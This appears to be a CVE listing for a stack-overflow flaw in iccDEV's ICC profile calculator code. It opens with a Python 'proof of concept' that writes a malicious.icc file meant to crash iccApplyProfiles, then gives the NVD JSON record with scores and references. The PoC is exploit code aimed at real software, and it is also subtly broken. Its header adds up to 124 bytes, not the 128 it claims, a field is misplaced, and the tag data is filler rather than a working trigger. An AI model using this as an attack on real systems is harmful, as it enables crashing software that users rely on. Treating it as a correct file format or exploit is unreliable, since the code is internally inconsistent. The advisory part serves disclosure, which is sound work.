CVE-2026-34536

import struct # Generate a malicious ICC profile header # This is a conceptual PoC. The actual trigger requires specific malformed calculator tags. # that cause SIccCalcOp::ArgsUsed() to recurse too deep. def create_malformed_icc(filename): with open(filename, 'wb') as f: # ICC Profile Header (128 bytes) # Profile size (set to a small value, but tags will extend it) f.write(struct.pack('>I', 0)) # CMM Type 'acsp' f.write(b'acsp') # Profile version 2.3.0 f.write(struct.pack('>I', 0x2300000)) # Profile/Device class (e.g., 'prtr' for printer) f.write(b'prtr') # Color space (e.g., 'RGB ') f.write(b'RGB ') # PCS (e.g., 'XYZ ') f.write(b'XYZ ') # Date/Time (12 bytes, dummy) f.write(b'\x00' * 12) # Magic signature 'acsp' f.write(b'acsp') # Platform signature (dummy) f.write(struct.pack('>I', 0)) # Flags (dummy) f.write(struct.pack('>I', 0)) # Manufacturer (dummy) f.write(struct.pack('>I', 0)) # Model (dummy) f.write(struct.pack('>I', 0)) # Attributes (dummy) f.write(struct.pack('>I', 0)) # Rendering Intent (dummy) f.write(struct.pack('>I', 0)) # Illuminant (XYZ Number, dummy) f.write(struct.pack('>III', 0, 0, 0)) # Creator (dummy) f.write(struct.pack('>I', 0)) # Profile ID (16 bytes, dummy) f.write(b'\x00' * 16) # Reserved (28 bytes) f.write(b'\x00' * 28) # Tag table entry count (1 tag) f.write(struct.pack('>I', 1)) # Tag Table Entry (开始于偏移 128) # Tag signature: 'mluc' or similar, but we need a calculator tag (e.g., 'bfd ') # In a real exploit, this tag data would be crafted to cause the overflow. tag_sig = b'bfd ' # Basic Formula Type (example) tag_offset = 128 + 4 + 12 # Header + Tag Count + Tag Entry Size tag_size = 1000 # Arbitrary size # Write Tag Entry f.write(tag_sig) f.write(struct.pack('>I', tag_offset)) f.write(struct.pack('>I', tag_size)) # Write Tag Data (Malformed content) # This content would typically be a formula that triggers the overflow in ArgsUsed() f.write(b'A' * tag_size) if __name__ == '__main__': create_malformed_icc('malicious.icc') print('Malformed ICC profile generated: malicious.icc') # To trigger the vulnerability, load this file using iccApplyProfiles in iccDEV < 2.3.1.6

{"cve": {"id": "CVE-2026-34536", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.130", "lastModified": "2026-04-20T13:51:11.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a stack overflow (SO) in SIccCalcOp::ArgsUsed(). The issue is observable under AddressSanitizer as a stack-overflow when iccApplyProfiles processes a malicious profile, with the crash occurring while computing argument usage during calculator underflow/overflow checks. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar un desbordamiento de pila (SO) en SIccCalcOp::ArgsUsed(). El problema es observable bajo AddressSanitizer como un desbordamiento de pila cuando iccApplyProfiles procesa un perfil malicioso, con el fallo ocurriendo mientras se calcula el uso de argumentos durante las comprobaciones de subdesbordamiento/desbordamiento de la calculadora. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/669", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/684", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-cr68-xp9x-8597", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}